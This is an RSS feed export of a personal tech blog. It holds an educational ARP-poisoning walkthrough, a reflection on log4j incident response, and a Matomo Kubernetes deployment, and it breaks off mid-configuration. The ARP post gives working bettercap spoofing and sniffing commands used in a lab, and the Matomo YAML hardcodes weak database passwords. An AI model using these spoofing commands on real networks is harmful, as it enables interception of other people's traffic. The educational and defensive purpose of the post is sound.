<?xml version="1.0" encoding="UTF-8"?><rss xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:atom="http://www.w3.org/2005/Atom" version="2.0" xmlns:media="http://search.yahoo.com/mrss/"><channel><title><![CDATA[TFerdinand.net]]></title><description><![CDATA[TFerdinand.net]]></description><link>https://en.tferdinand.net/</link><generator>Ghost 5.75</generator><lastBuildDate>Wed, 22 Apr 2026 06:37:49 GMT</lastBuildDate><atom:link href="https://en.tferdinand.net/rss/" rel="self" type="application/rss+xml"/><ttl>60</ttl><item><title><![CDATA[Attack techniques: understanding ARP poisoning]]></title><description><![CDATA[<div class="kg-card kg-toggle-card" data-kg-toggle-state="close"><div class="kg-toggle-heading"><h4 class="kg-toggle-heading-text">Disclaimer</h4><button class="kg-toggle-card-icon"><svg id="Regular" xmlns="http://www.w3.org/2000/svg" viewbox="0 0 24 24"><path class="cls-1" d="M23.25,7.311,12.53,18.03a.749.749,0,0,1-1.06,0L.75,7.311"/></svg></button></div><div class="kg-toggle-content"><p>As often on this kind of post, I would like to remind you that the content you will find here is for <u>educational purposes</u> only.</p><p>Unauthorized intrusion in an information system is punishable by fine and/or imprisonment.</p></div></div><p>Understanding attacks means knowing how to avoid them. In this post,</p>]]></description><link>https://en.tferdinand.net/attack-techniques-understanding-arp-poisoning/</link><guid isPermaLink="false">63522bc065fbc6000155a6a5</guid><category><![CDATA[Security]]></category><category><![CDATA[hacking]]></category><dc:creator><![CDATA[Teddy FERDINAND]]></dc:creator><pubDate>Fri, 21 Oct 2022 05:37:16 GMT</pubDate><media:content url="https://images.unsplash.com/photo-1519874894605-54cfd04fa2fc?crop=entropy&amp;cs=tinysrgb&amp;fit=max&amp;fm=jpg&amp;ixid=MnwxMTc3M3wwfDF8c2VhcmNofDI4fHxwb2lzb258ZW58MHx8fHwxNjY2MzMwMjU1&amp;ixlib=rb-4.0.3&amp;q=80&amp;w=2000" medium="image"/><content:encoded><![CDATA[<div class="kg-card kg-toggle-card" data-kg-toggle-state="close"><div class="kg-toggle-heading"><h4 class="kg-toggle-heading-text">Disclaimer</h4><button class="kg-toggle-card-icon"><svg id="Regular" xmlns="http://www.w3.org/2000/svg" viewbox="0 0 24 24"><path class="cls-1" d="M23.25,7.311,12.53,18.03a.749.749,0,0,1-1.06,0L.75,7.311"/></svg></button></div><div class="kg-toggle-content"><img src="https://images.unsplash.com/photo-1519874894605-54cfd04fa2fc?crop=entropy&amp;cs=tinysrgb&amp;fit=max&amp;fm=jpg&amp;ixid=MnwxMTc3M3wwfDF8c2VhcmNofDI4fHxwb2lzb258ZW58MHx8fHwxNjY2MzMwMjU1&amp;ixlib=rb-4.0.3&amp;q=80&amp;w=2000" alt="Attack techniques: understanding ARP poisoning"><p>As often on this kind of post, I would like to remind you that the content you will find here is for <u>educational purposes</u> only.</p><p>Unauthorized intrusion in an information system is punishable by fine and/or imprisonment.</p></div></div><p>Understanding attacks means knowing how to avoid them. In this post, I propose you see a common network attack model: ARP poisoning.</p><h2 id="what-is-arp">What is ARP?</h2><p>To understand the attack, we must already understand what it is based on.</p><p>For ARP, we will start from the OSI model, describing the different layers of the network.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://en.tferdinand.net/content/images/2022/10/image-12.png" class="kg-image" alt="Attack techniques: understanding ARP poisoning" loading="lazy" width="600" height="764" srcset="https://en.tferdinand.net/content/images/2022/10/image-12.png 600w"><figcaption>Source : BMC</figcaption></figure><p>ARP is the link between layers 2 and 3, it is what will allow a computer or server to convert an IP address into a hardware address (MAC).</p><p>To work, ARP uses a broadcast system. Each device on the network sends its IP address associated with its hardware address to the whole network.</p><p>You can easily access and modify this table with the arp -a command (either under Linux or Windows).</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://en.tferdinand.net/content/images/2022/10/image-1.png" class="kg-image" alt="Attack techniques: understanding ARP poisoning" loading="lazy" width="457" height="333"><figcaption>ARP Table example</figcaption></figure><h2 id="the-weakness-of-this-protocol">The weakness of this protocol</h2><p>I think you have already located the weak point: each node sends information, and there is no way to check the veracity of this information.</p><p>So, I can very well advertise my MAC address as the router&apos;s IP.</p><p>Each node (or nodes targeted) on my network will receive this information and update its ARP table with the match.</p><h2 id="how-does-the-attack-work">How does the attack work?</h2><p>There is a prerequisite, to be on the same network as the target.</p><p>Then the idea is to be between the target and the router. This will allow to launch a &quot;Man in the middle&quot; attack to capture all the network traffic between my target and the router.</p><p>For example I will describe in this blogpost, I will put myself between my PC and my Livebox on my own network.</p><p>To do this, I will send two different pieces of information.</p><p>From my attacking PC, I will tell my livebox that I am the victim&apos;s PC.</p><p>To my victim, I will say that I am the livebox. In this way, I can have both information flows passing through my attacking PC, positioning myself in the same way as a proxy.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://en.tferdinand.net/content/images/2022/10/image-2.png" class="kg-image" alt="Attack techniques: understanding ARP poisoning" loading="lazy" width="922" height="1364" srcset="https://en.tferdinand.net/content/images/size/w600/2022/10/image-2.png 600w, https://en.tferdinand.net/content/images/2022/10/image-2.png 922w" sizes="(min-width: 720px) 720px"><figcaption>before/after the attack</figcaption></figure><h2 id="the-attack-in-detail">The attack in detail</h2><h3 id="requirements">Requirements</h3><p>As I described above, I will need several things to proceed with my attack:</p><ul><li>Access to the same network as my target</li><li>A PC with different tools (which I will describe below)</li><li>The IP of my target, even if I can do without it, as we will see</li></ul><p>In the case of this post, I will use two &quot;Lab&quot; virtual machines:</p><ul><li>My attacker will be a VM running Kali Linux</li><li>My target will be a VM running Windows 10</li></ul><h3 id="detect-the-windows-pc">Detect the Windows PC</h3><p>To perform my attack, I will use the popular <a href="https://www.bettercap.org/?ref=en.tferdinand.net">bettercap</a>.</p><p>It will provide me with all the tools I need to detect the devices on my network and perform ARP poisoning.</p><p>So I will start it with the command below:</p><!--kg-card-begin: markdown--><pre><code class="language-sh">bettercap -iface eth0
</code></pre>
<!--kg-card-end: markdown--><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://en.tferdinand.net/content/images/2022/10/image-3.png" class="kg-image" alt="Attack techniques: understanding ARP poisoning" loading="lazy" width="932" height="112" srcset="https://en.tferdinand.net/content/images/size/w600/2022/10/image-3.png 600w, https://en.tferdinand.net/content/images/2022/10/image-3.png 932w" sizes="(min-width: 720px) 720px"><figcaption>Bettercap starting</figcaption></figure><p>Bettercap works with modules, which can be configured and executed. I won&apos;t go into the details of the modules here, and I invite you to consult the associated documentation for more details.</p><p>If necessary you can use the help command to see the available commands and modules and their status.</p><figure class="kg-card kg-image-card"><img src="https://en.tferdinand.net/content/images/2022/10/image-4.png" class="kg-image" alt="Attack techniques: understanding ARP poisoning" loading="lazy" width="1104" height="848" srcset="https://en.tferdinand.net/content/images/size/w600/2022/10/image-4.png 600w, https://en.tferdinand.net/content/images/size/w1000/2022/10/image-4.png 1000w, https://en.tferdinand.net/content/images/2022/10/image-4.png 1104w" sizes="(min-width: 720px) 720px"></figure><p>At first, we will use the &quot;net.probe&quot; module.</p><p>As its name indicates, this module will allow us to detect the devices on the network.</p><!--kg-card-begin: markdown--><pre><code>net.probe on
net.show
</code></pre>
<!--kg-card-end: markdown--><p>We find my target below, which is none other than the IP <code>192.168.109.130</code></p><h3 id="lets-start-having-fun">Let&apos;s start having fun</h3><p>Now we&apos;re going to launch the attack on the target&apos;s ARP table.</p><p>Before we start, I&apos;ll just capture my target&apos;s table.</p><figure class="kg-card kg-image-card"><img src="https://en.tferdinand.net/content/images/2022/10/image-5.png" class="kg-image" alt="Attack techniques: understanding ARP poisoning" loading="lazy" width="471" height="224"></figure><p>The most important thing here is the IP 192.168.109.2 which is the IP of my virtual router.</p><p>From my Kali VM, still in bettercap, I&apos;m going on the offensive!</p><!--kg-card-begin: markdown--><pre><code class="language-sh">set arp.spoof.fullduplex true          #Launch the attack on both sides : victim and router
set arp.spoof.targets 192.168.109.130  #IP address of the victim
arp.spoof on                           #Initiate the attack
</code></pre>
<!--kg-card-end: markdown--><p>The first line is important, because it will allow launching directly the attack on both sides.</p><p>Note that some routers are protected against ARP attacks. In this case, we will only see the frames leaving the target, but not the return, which limits the attacks.</p><figure class="kg-card kg-image-card"><img src="https://en.tferdinand.net/content/images/2022/10/image-6.png" class="kg-image" alt="Attack techniques: understanding ARP poisoning" loading="lazy" width="1692" height="116" srcset="https://en.tferdinand.net/content/images/size/w600/2022/10/image-6.png 600w, https://en.tferdinand.net/content/images/size/w1000/2022/10/image-6.png 1000w, https://en.tferdinand.net/content/images/size/w1600/2022/10/image-6.png 1600w, https://en.tferdinand.net/content/images/2022/10/image-6.png 1692w" sizes="(min-width: 720px) 720px"></figure><p>If I look at the ARP table of my target now, we&apos;ll see that the router&apos;s IP is not the same anymore!</p><p>By the way, we&apos;ll notice that it now has the same MAC address as my Kali VM <code>192.168.109.129</code>.</p><figure class="kg-card kg-image-card"><img src="https://en.tferdinand.net/content/images/2022/10/image-7.png" class="kg-image" alt="Attack techniques: understanding ARP poisoning" loading="lazy" width="476" height="240"></figure><p>Now I am able to see the traffic going in and out of this PC with a simple <code>net.sniff on</code></p><figure class="kg-card kg-image-card"><img src="https://en.tferdinand.net/content/images/2022/10/image-8.png" class="kg-image" alt="Attack techniques: understanding ARP poisoning" loading="lazy" width="1000" height="525" srcset="https://en.tferdinand.net/content/images/size/w600/2022/10/image-8.png 600w, https://en.tferdinand.net/content/images/2022/10/image-8.png 1000w" sizes="(min-width: 720px) 720px"></figure><h2 id="what-does-it-get-me-at-this-point">What does it get me at this point?</h2><p>At this point, I am able to capture all unencrypted traffic leaving my victim&apos;s PC.</p><p>This means I can see:</p><ul><li>HTTP calls</li><li>Unencrypted DNS requests</li><li>SNI requests</li></ul><h3 id="its-all-crap-we-only-see-http">It&apos;s all crap, we only see HTTP</h3><p>Many will say that this is a small part of the network. This is true and false at the same time.</p><p>If I&apos;m in a company, many consider that it is not necessary to put encryption for internal endpoints for example, so it can potentially capture a lot of traffic.</p><p>Also, knowing which site a user is going to potentially allows me to target an attack, whether it&apos;s phishing or social engineering.</p><p>Finally, this part should be seen as a first step, indeed, once I am positioned in man in the middle it also allows me to alter the traffic to change what my victim sees, but we will see this point in another post!</p><h2 id="in-conclusion-beware-of-all-networks">In conclusion, beware of ALL networks</h2><p>The purpose of this post is to remind that an attacker is not necessarily external, even in your corporate network it is possible to do a lot of damage.</p><p>ARP spoofing is one of the issues that are normally covered by most enterprise routers, but not all. It is important to protect against it.</p><p>Most consumer routers don&apos;t offer any particular protection against this, for example, I can do this attack on my Livebox.</p><p>This also reminds us of the importance of encrypting all outgoing traffic from your PC, via a VPN for example, there are still many (too many) services communicating in HTTP.</p><p>In companies, do not hesitate to impose TLS everywhere, including internally.</p>]]></content:encoded></item><item><title><![CDATA[Log4j from the eye of the storm]]></title><description><![CDATA[<p>Unless you live in a cave, you couldn&#x2019;t miss the last few days the <a href="https://logging.apache.org/log4j/2.x/security.html?ref=en.tferdinand.net">flaws discovered on the Java log4j library</a>.</p><p>I&#x2019;m not going to make another post talk about this flaw, but rather to talk about my experience in the field on the impact of</p>]]></description><link>https://en.tferdinand.net/log4j-from-the-eye-of-the-storm/</link><guid isPermaLink="false">6337ff9a65fbc6000155a569</guid><category><![CDATA[actuality]]></category><category><![CDATA[architecture]]></category><category><![CDATA[Security]]></category><category><![CDATA[java]]></category><category><![CDATA[log4j]]></category><dc:creator><![CDATA[Teddy FERDINAND]]></dc:creator><pubDate>Mon, 20 Dec 2021 20:37:40 GMT</pubDate><media:content url="https://images.unsplash.com/photo-1600377927594-ceae8f8981a6?crop=entropy&amp;cs=tinysrgb&amp;fit=max&amp;fm=jpg&amp;ixid=MnwxMTc3M3wwfDF8c2VhcmNofDF8fHRlbXBlc3R8ZW58MHx8fHwxNjQwMDMxNzEy&amp;ixlib=rb-1.2.1&amp;q=80&amp;w=2000" medium="image"/><content:encoded><![CDATA[<img src="https://images.unsplash.com/photo-1600377927594-ceae8f8981a6?crop=entropy&amp;cs=tinysrgb&amp;fit=max&amp;fm=jpg&amp;ixid=MnwxMTc3M3wwfDF8c2VhcmNofDF8fHRlbXBlc3R8ZW58MHx8fHwxNjQwMDMxNzEy&amp;ixlib=rb-1.2.1&amp;q=80&amp;w=2000" alt="Log4j from the eye of the storm"><p>Unless you live in a cave, you couldn&#x2019;t miss the last few days the <a href="https://logging.apache.org/log4j/2.x/security.html?ref=en.tferdinand.net">flaws discovered on the Java log4j library</a>.</p><p>I&#x2019;m not going to make another post talk about this flaw, but rather to talk about my experience in the field on the impact of this flaw at the operational level.</p><h2 id="the-importance-of-having-an-up-to-date-inventory">The importance of having an up-to-date inventory</h2><p>I talked about this on Twitter (in French), but for me, this flaw highlights the fact that many companies lack an up-to-date inventory of their resources.</p><figure class="kg-card kg-embed-card"><blockquote class="twitter-tweet"><p lang="fr" dir="ltr">L&apos;asset management est primordial si vous voulez faire de la s&#xE9;curit&#xE9;!<br><br>La faille majeure <a href="https://twitter.com/hashtag/log4j?src=hash&amp;ref_src=twsrc%5Etfw&amp;ref=en.tferdinand.net">#log4j</a> le rappelle, il faut patcher vite, mais pour le faire il faut avoir un inventaire &#xE0; jour!<br><br>Encore une fois, le plus important n&apos;est pas forc&#xE9;ment l&apos;application ;)</p>&#x2014; Teddy FERDINAND (@TeddyFERDINAND1) <a href="https://twitter.com/TeddyFERDINAND1/status/1469624289381040128?ref_src=twsrc%5Etfw&amp;ref=en.tferdinand.net">December 11, 2021</a></blockquote>
<script async src="https://platform.twitter.com/widgets.js" charset="utf-8"></script>
</figure><p>When a breach like this occurs, it is important to be able to quickly identify which resources are at risk. But having an up-to-date inventory is not just about the machines, but also about their content.</p><p>This is even more important when you exploit the power of the cloud, having volatile machines make their management even more complex.</p><p>For that there are several solutions.</p><h3 id="doing-only-infra-as-code">Doing only infra as code</h3><p>This point will seem essential to many of you, but only doing infra as code simplifies things enormously in order to quickly visualize what is being deployed, on which project, which machine, which account, etc.</p><p>In a CI/CD pipeline, it is the role of a SAST (static application security testing) to identify common flaws when compiling new projects; however, there needs to be tooling for already compiled projects, for example, on GitHub, Dependabot showed me fairly quickly the projects in which it had identified the use of the library.</p><p>However, this point is clearly not enough. Just because I don&#x2019;t explicitly define a library doesn&#x2019;t mean it is not used.</p><h3 id="scanning-already-created-artifacts">Scanning already created artifacts</h3><p>If your applications are already compiled, there are often solutions on your library managers to scan them.</p><p>For example, Docker Hub allows<a href="https://docs.docker.com/engine/scan/?ref=en.tferdinand.net#scan-images-for-log4j-2-cve"> you to scan your images for the library</a>.</p><p>However, this is still not enough. On your servers, you do not necessarily use only packages that you master and reference yourself.</p><p>For example, you can use an AWS image of a publisher in the marketplace, or have third-party applications deployed in your infrastructure.</p><h3 id="continuously-scan-your-servers">Continuously scan your servers</h3><p>This is where the third level of scanning comes into play: you can continuously scan your machines to quickly identify servers in danger.</p><p>To do this, there are tools like <a href="https://fr.tenable.com/?ref=en.tferdinand.net">Nessus Tenable</a> or<a href="https://www.rapid7.com/products/insightvm/?ref=en.tferdinand.net"> Rapid7 InsightVM</a>. The role of these tools will be to scan your servers and report to you the machines at risk.</p><p>A simple search with the identifier of a CVE allows you to quickly identify the impacted servers.</p><h3 id="how-i-lived-this-stage">How I lived this stage</h3><p>Like many in infosec these last days, this first step was complicated. Even with tools, there is always a risk of missing some resources.</p><p>I work in a small team and we reacted as best we could, but given the risk involved with this vulnerability, we are re-running several checks. This point is exhausting, because we have to do a lot of manual actions, not everything can be automated.</p><p>It is a laborious step, mentally exhausting, but essential and critical.</p><h2 id="once-the-servers-are-identified-what-do-i-do">Once the servers are identified, what do I do?</h2><p>Now that I know which of my resources are affected by the log4j vulnerability, what do I do?</p><p>The first thing we often forget<strong>: don&#x2019;t panic!</strong></p><p>This is a behavior I often see during security incidents, yet it is all the more important to keep a cool head as a mistake can be costly!</p><h3 id="patch-patch-patch%E2%80%A6">Patch, patch, patch&#x2026;</h3><p>The solution will often be the same here: patch or update the application. However, not all editors are as serious about this game.</p><p>At this point, I have seen several behaviors:</p><ul><li>Publishers who are very reactive and transparent about the risks</li><li>Publishers who say they don&#x2019;t know (which is not necessarily reassuring, by the way).</li><li>Publishers who say they are impacted, but take several days to release a version with the necessary fix</li><li>Those who say they are not impacted and then indicate the opposite</li><li>Those who prefer to indicate that they are not impacted when they are far from java (for example HashiCorp and its tools written in GoLang)<br></li></ul><h3 id="depend-on-other-teams">Depend on other teams</h3><p>At my position, I am not the one who patches, but in the team that will identify the risks, measure them and ask the necessary actions to other teams (Dev, Ops, DataOps, etc.)</p><p>It&#x2019;s a position that can be frustrating, because you depend on people over whom you have no power of prioritization and not everyone necessarily perceives the risks of these flaws.</p><p>This is why it is important to have (once again) a pedagogical posture, and to explain the risks and why it is important to react quickly.</p><p>And it is also at this stage that it is important to trace all the requests and do the associated follow-up.</p><p>One of the temporary solutions can sometimes be to mitigate the risk to reduce as much as possible the impact of third party slowness, this can be done: by rules on WAF, package modifications directly on the machines (even if I&#x2019;m not a fan of this solution), change the exposure of some machines (move machines behind a VPN for example) or interrupt some services temporarily.</p><p>The temporary solution depends, of course, on the assessment of the associated risk.</p><h3 id="how-i-lived-this-stage-1">How I lived this stage</h3><p>As I mentioned, I was a bit frustrated by the lack of response from some teams, or the impression that they didn&#x2019;t care&#x2026; For some teams, I&#x2019;m just one incident among many already in progress, and I&#x2019;m just adding a piece to the machine.</p><p>This step is not necessarily simple, but I find it simpler than having the inventory.</p><h3 id="after-log4j">After log4j</h3><p>For the moment the log4j storm is not over yet, with a flaw discovered the day before yesterday as I write these lines.</p><h3 id="invest-in-security">Invest in security</h3><p>This storm, like others before it (<a href="https://en.wikipedia.org/wiki/Spectre_(security_vulnerability)?ref=en.tferdinand.net">Spectre</a>, <a href="https://en.wikipedia.org/wiki/Meltdown_(security_vulnerability)?ref=en.tferdinand.net">Meltdown</a>, <a href="https://en.wikipedia.org/wiki/Heartbleed?ref=en.tferdinand.net">Heartbleed</a>, etc.) is an opportunity for security teams to remind the importance of certain investments:</p><ul><li>Having a security team that keeps up to date</li><li>Having the tools to quickly identify vulnerabilities</li><li>Having an up-to-date inventory</li><li>Educate teams on the importance of good security practices</li></ul><p>I even reiterated this point (on Twitter once again, in French) recently:</p><figure class="kg-card kg-embed-card"><blockquote class="twitter-tweet"><p lang="fr" dir="ltr">A tout ceux qui pensent que la <a href="https://twitter.com/hashtag/s%C3%A9curit%C3%A9?src=hash&amp;ref_src=twsrc%5Etfw&amp;ref=en.tferdinand.net">#s&#xE9;curit&#xE9;</a> informatique est un co&#xFB;t... Vous avez tort!<br><br>La s&#xE9;curit&#xE9; est un <a href="https://twitter.com/hashtag/investissement?src=hash&amp;ref_src=twsrc%5Etfw&amp;ref=en.tferdinand.net">#investissement</a>, tr&#xE8;s vite rentabilis&#xE9; que ce soit sur des attaques &#xE9;vit&#xE9;es ou en image de marque.<br><br>C&apos;est ce qui inspire confiance &#xE0; vos clients/utilisateurs!</p>&#x2014; Teddy FERDINAND (@TeddyFERDINAND1) <a href="https://twitter.com/TeddyFERDINAND1/status/1469261397259341825?ref_src=twsrc%5Etfw&amp;ref=en.tferdinand.net">December 10, 2021</a></blockquote>
<script async src="https://platform.twitter.com/widgets.js" charset="utf-8"></script>
</figure><h3 id="fighting-the-predatory-behavior-of-big-tech">Fighting the predatory behavior of big tech </h3><p>This flaw reminds us of the harsh realities of open source projects: many projects are clearly exploited by many huge companies that rely on them without ever contributing either code or at least financially.</p><p>Log4j is a library exploited by millions of applications in the world, yet it is now by few people.</p><p>Many techs in the open source world have made the same observation (in French, once again):</p><figure class="kg-card kg-embed-card"><blockquote class="twitter-tweet"><p lang="fr" dir="ltr">1/7 Depuis le d&#xE9;but du week-end, une faille, nomm&#xE9;e log4shell et jug&#xE9;e comme la plus importante faille de s&#xE9;curit&#xE9; de ces 10 derni&#xE8;res ann&#xE9;es, agite le monde de la tech. L&apos;immense majorit&#xE9; des entreprises de la tech est touch&#xE9;e, allant de Microsoft &#xE0; Spotify en passant par Tesla. <a href="https://t.co/o2gsKeORAy?ref=en.tferdinand.net">pic.twitter.com/o2gsKeORAy</a></p>&#x2014; Olivier P&#x1F92B;ncet (@ponceto91) <a href="https://twitter.com/ponceto91/status/1470301903250771969?ref_src=twsrc%5Etfw&amp;ref=en.tferdinand.net">December 13, 2021</a></blockquote>
<script async src="https://platform.twitter.com/widgets.js" charset="utf-8"></script>
</figure><p>This is not unlike recent battles:</p><ul><li>Elastic.co VS AWS</li><li>MongoDB VS AWS</li></ul><p>In the absence of a viable solution, the solution is often to go through the legal process by putting clauses preventing the use of these companies, because they exploit the wealth of these projects without ever giving anything in return.</p>]]></content:encoded></item><item><title><![CDATA[OpenSource Traefik ratings with Matomo]]></title><description><![CDATA[<p>Some time ago, I talked to you about tracking and <a href="https://en.tferdinand.net/why-do-i-care-about-my-personal-data/">why I care about my privacy</a>. In my conclusion, I indicated that user tracking was still a useful tool for a company, as long as it was ethical and respectful of users.</p><p>However, very often, I see that Google Analytics</p>]]></description><link>https://en.tferdinand.net/opensource-traefik-ratings-with-matomo/</link><guid isPermaLink="false">6337ff9a65fbc6000155a570</guid><category><![CDATA[Docker]]></category><category><![CDATA[Traefik]]></category><category><![CDATA[Google]]></category><category><![CDATA[Kubernetes]]></category><dc:creator><![CDATA[Teddy FERDINAND]]></dc:creator><pubDate>Mon, 15 Feb 2021 07:34:00 GMT</pubDate><media:content url="https://en.tferdinand.net/content/images/2022/01/Webp.net-compress-image--4-.jpg" medium="image"/><content:encoded><![CDATA[<img src="https://en.tferdinand.net/content/images/2022/01/Webp.net-compress-image--4-.jpg" alt="OpenSource Traefik ratings with Matomo"><p>Some time ago, I talked to you about tracking and <a href="https://en.tferdinand.net/why-do-i-care-about-my-personal-data/">why I care about my privacy</a>. In my conclusion, I indicated that user tracking was still a useful tool for a company, as long as it was ethical and respectful of users.</p><p>However, very often, I see that Google Analytics is used by the sites I browse on. It is far (even very far) from being respectful of your users&apos; data. Even worse! You allow Google to know the activity of your site from end to end and to know how to better target its ads (among others).</p><p>Today, I propose you see how it is possible to track users while showing respect for them.</p><h2 id="what-is-matomo">What is Matomo?</h2><p>Matomo is an OpenSource alternative to Google Analytics. Available on GitHub, it allows you to deploy a complete application with a dashboard and a tracking system in JavaScript. It is also possible to rely on reading server logs rather than JavaScript.</p><figure class="kg-card kg-bookmark-card"><a class="kg-bookmark-container" href="https://github.com/matomo-org/matomo?ref=en.tferdinand.net"><div class="kg-bookmark-content"><div class="kg-bookmark-title">GitHub - matomo-org/matomo: Liberating Web Analytics. Star us on Github? +1. Matomo is the leading open alternative to Google Analytics that gives you full control over your data. Matomo lets you easily collect data from websites &amp; apps and visualise this data and extract insights. Privacy is built-in. We love Pull Requests!</div><div class="kg-bookmark-description">Liberating Web Analytics. Star us on Github? +1. Matomo is the leading open alternative to Google Analytics that gives you full control over your data. Matomo lets you easily collect data from webs...</div><div class="kg-bookmark-metadata"><img class="kg-bookmark-icon" src="https://github.com/fluidicon.png" alt="OpenSource Traefik ratings with Matomo"><span class="kg-bookmark-author">GitHub</span><span class="kg-bookmark-publisher">matomo-org</span></div></div><div class="kg-bookmark-thumbnail"><img src="https://opengraph.githubassets.com/945ba5a26678eb77b11f2a150bffe5ae10963554e70a0b9d73ef81afc6295b57/matomo-org/matomo" alt="OpenSource Traefik ratings with Matomo"></div></a></figure><p>Having an open source solution allows you to know its intricacies, but above all and the guarantee of respect for your users. The free software carries today the majority of the internet (including this web site).</p><p>Matomo allows you to have the statistics classically used as (in a non-exhaustive way):</p><ul><li>The visited pages</li><li>The &quot;User Agent&quot; (OS, Browser, language, etc.)</li><li>The transformation rate of social networks</li><li>The GeoIp</li><li>The bounce rate</li><li>The duration of sessions</li></ul><p>Based on the classic, but efficient PHP + MySql couple, the application is light and also integrates components aimed at respecting privacy:</p><ul><li>Support of the DoNotTrack header, which allows you to indicate that you do not want the website to track your activity</li><li>Support for RGPD constraints (informed consent), it is possible to activate or deactivate Matomo directly for each user</li><li>Native anonymization or pseudoanonymization of data</li></ul><p>Thus it is possible to have clear and complete statistics without being intrusive.</p><p>Note that there is also a solution managed directly by Matomo, available on their website.</p><figure class="kg-card kg-bookmark-card"><a class="kg-bookmark-container" href="https://fr.matomo.org/?ref=en.tferdinand.net"><div class="kg-bookmark-content"><div class="kg-bookmark-title">Matomo - L&#x2019;alternative &#xE0; Google Analytics qui prot&#xE8;ge vos donn&#xE9;es</div><div class="kg-bookmark-description">Matomo est l&#x2019;alternative &#xE9;thique &#xE0; Google Analytics qui prot&#xE8;ge vos donn&#xE9;es et la vie priv&#xE9;e de vos clients Une puissante plateforme d&#x2019;analyse Web avec la propri&#xE9;t&#xE9; de 100 % des donn&#xE9;es.</div><div class="kg-bookmark-metadata"><img class="kg-bookmark-icon" src="https://static.matomo.org/wp-content/uploads/2018/11/cropped-DefaultIcon-270x270.png" alt="OpenSource Traefik ratings with Matomo"><span class="kg-bookmark-author">Analytics Platform - Matomo</span><span class="kg-bookmark-publisher">Himanshu Sharma | Digital Marketing Consultant</span></div></div><div class="kg-bookmark-thumbnail"><img src="https://matomo.org/wp-content/uploads/2020/06/website-graphics-2020-v5-1.png" alt="OpenSource Traefik ratings with Matomo"></div></a></figure><p>In the case I&apos;m going to present today, we&apos;ll start from the official docker image.</p><h2 id="deploying-matomo-in-kubernetes">Deploying Matomo in Kubernetes</h2><p>As usual on this blog, I&apos;m going to talk about deploying in Kubernetes, because that&apos;s what I have on hand and it&apos;s becoming more and more common today.</p><p>As a reminder, my deployment is not a &quot;prod ready&quot; deployment in enterprise, it doesn&apos;t handle high availability and scaling is catastrophic since the database is in the same pod. This post is simply a &quot;demo&quot; of what is possible so you can easily adapt it to your needs. The idea is, of course, that you can make the tool your own.</p><p>Although the deployment is in Kubernetes, it remains easily transposable to Docker or Docker-compose (or podman, or rancher, etc.).</p><p>So here&apos;s the deployment we&apos;re going to do, in blue are the elements we&apos;re going to create:</p><figure class="kg-card kg-image-card"><img src="https://en.tferdinand.net/content/images/2022/01/image-1-1.png" class="kg-image" alt="OpenSource Traefik ratings with Matomo" loading="lazy" width="1042" height="1062" srcset="https://en.tferdinand.net/content/images/size/w600/2022/01/image-1-1.png 600w, https://en.tferdinand.net/content/images/size/w1000/2022/01/image-1-1.png 1000w, https://en.tferdinand.net/content/images/2022/01/image-1-1.png 1042w" sizes="(min-width: 720px) 720px"></figure><p>So we will have 3 yaml files:</p><ul><li>A &quot;deployment&quot; carrying Matomo and MySql</li><li>A &quot;service&quot; allowing exposing Matomo</li><li>IngressRoute allowing Traefik to serve Matomo and manage its TLS certificate</li></ul><h3 id="the-deployment">The deployment</h3><p>We are here on something very basic:</p><ul><li>Two images (Matomo and MySql)</li><li>A database configuration (user, default database, etc.)</li><li>Some persistent storage</li></ul><pre><code class="language-yaml">apiVersion: apps/v1beta1
kind: Deployment
metadata:
  name: matomo
  labels:
    app: matomo
spec:
  replicas: 1
  selector:
    matchLabels:
      app: matomo
  template:
    metadata:
      labels:
        app: matomo
    spec:
      containers:
      - name: matomo
        image: matomo:4.1.1-apache
        imagePullPolicy: Always
        ports:
        - containerPort: 80
        env:
        - name: MATOMO_DATABASE_HOST
          value: 127.0.0.1
        - name: MATOMO_DATABASE_USERNAME
          value: &quot;root&quot;
        - name: MATOMO_DATABASE_PASSWORD
          value: &quot;matomo&quot;
        - name: MATOMO_DATABASE_DBNAME
          value: &quot;matomo&quot;
        volumeMounts:
        - name: matomo-storage
          mountPath: /var/www/html/config
      - name: mysql
        volumeMounts:
        - name : mysql-storage
          mountPath: /var/lib/mysql
        image: mysql:8.0.23
        imagePullPolicy: Always
        ports:
        - containerPort: 3306
        env:
        - name: MYSQL_ROOT_PASSWORD
          value: &quot;matomo&quot;
        - name: MYSQL_DATABASE
          value: &quot;matomo&quot;
        resources:
          limits:
            cpu: &quot;0.2&quot;
            memory: &quot;512Mi&quot;
      volumes:
      - name: mysql-storage
        hostPath:
          path: /home/kube/matomo/content/mysql
          type: Directory
      - name: matomo-storage
        hostPath:
          path: /home/kube/matomo/content/matomo
          type: Directory</code></pre><p>We find, first of all, the Matomo container, based on an Apache image.</p><p>This last one has as configuration :</p><ul><li>A binding on port 80 of the pod</li><li>The configuration of the database. In my example, I don&apos;t need to put a strong password, because the database is dedicated to Matomo and is only accessible by the latter.</li><li>A persistent storage. This allows Matomo to store its configurations locally (especially the database configuration). This configuration is not valid for a high availability deployment, as I use local storage</li></ul><p>Then, we have a second container that carries the MySql database, with the following configuration:</p><ul><li>Logins and passwords on the database</li><li>The binding of port 3306 inside the pod only, so only accessible by Matomo</li><li>A persistent storage : I don&apos;t want to lose my data at the slightest reboot. Once again, this configuration is not valid for a high availability deployment.</li></ul><p>Then, we have a service, which will allow us to expose Matomo :</p><pre><code class="language-yaml">kind: Service
apiVersion: v1
metadata:
  labels:
    app: matomo
  name: matomo
spec:
  type: ClusterIP
  ports:
  - port: 80
    name: http
  selector:
    app: matomo
</code></pre><p>Nothing transcendent here, I simply bind the port 80 of my pod to a Kubernetes ClusterIP.</p><p>Finally, I declare IngressRoute, this is the one that will allow Traefik to route traffic to my pod.</p><pre><code class="language-yaml">kind: IngressRoute
metadata:
  name: matomo-tls
  namespace: default
spec:
  entryPoints:
    - websecure
  routes:
  - kind: Rule
    match: Host(`matomo.tferdinand.net`)
    services:
    - name: matomo
      port: 80
    middlewares:
      - name: security
  tls:
    certResolver: le
    options:
      name: mytlsoption
      namespace: default
---
apiVersion: traefik.containo.us/v1alpha1
kind: IngressRoute
metadata:
  name: matomo
  namespace: default
spec:
  entryPoints:
    - web
  routes:
  - kind: Rule
    match: Host(`matomo.tferdinand.net`)
    services:
    - name: matomo
      port: 80
